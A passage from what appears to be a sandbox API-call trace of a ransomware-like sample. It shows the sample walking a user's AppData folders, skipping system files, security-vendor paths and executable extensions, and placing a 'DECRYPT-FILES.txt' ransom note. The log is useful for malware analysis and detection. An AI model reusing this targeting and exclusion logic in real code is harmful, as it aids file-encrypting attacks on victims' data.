[0180.586] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.586] CloseHandle (hObject=0x284) returned 1 [0180.587] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar\\", cAlternateFileName="")) returned 0 [0180.587] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.587] CloseHandle (hObject=0x27c) returned 1 [0180.587] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="autorun.inf") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot.ini") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="desktop.ini") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="iconcache.db") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootsect.bak") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat.log") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="thumbs.db") returned 1 [0180.587] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Bootfont.bin") returned 1 [0180.587] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0180.587] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.587] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0180.587] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.587] CloseHandle (hObject=0x274) returned 1 [0180.588] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0180.588] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0180.588] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0180.588] lstrcatW (in: lpString1="UserData", lpString2="\\" | out: lpString1="UserData\\") returned="UserData\\" [0180.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="UserData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Program Files") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch=":\\Windows") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Games\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\All Users") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="AhnLab") returned 0x0 [0180.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0180.588] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.588] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\0a16c9.tmp") returned 94 [0180.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0180.589] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.589] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\DECRYPT-FILES.txt") returned 101 [0180.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0180.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0180.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.590] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.590] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.590] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.590] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.590] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec31940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.590] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.590] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.590] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.590] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.590] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.590] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0180.590] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.590] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0180.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\0a16c9.tmp" [0180.590] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.591] CloseHandle (hObject=0x0) returned 0 [0180.591] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.591] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.591] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.591] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaa25d20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaa25d20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0180.591] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0180.591] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0180.591] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0180.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Program Files") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch=":\\Windows") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Games\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\All Users") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="AhnLab") returned 0x0 [0180.592] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0180.592] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.592] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\0a16c9.tmp") returned 98 [0180.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.593] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0180.593] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.593] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\DECRYPT-FILES.txt") returned 105 [0180.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.594] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0180.594] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0180.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.594] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.594] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.594] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.594] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.594] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec31940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.594] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.594] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.594] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.595] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.595] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.595] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.595] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0180.595] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.595] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0180.595] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\0a16c9.tmp" [0180.595] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.595] CloseHandle (hObject=0x0) returned 0 [0180.595] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.595] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="65UX3YG0", cAlternateFileName="")) returned 1 [0180.595] lstrcmpW (lpString1="65UX3YG0", lpString2=".") returned 1 [0180.595] lstrcmpW (lpString1="65UX3YG0", lpString2="..") returned 1 [0180.595] lstrcatW (in: lpString1="65UX3YG0", lpString2="\\" | out: lpString1="65UX3YG0\\") 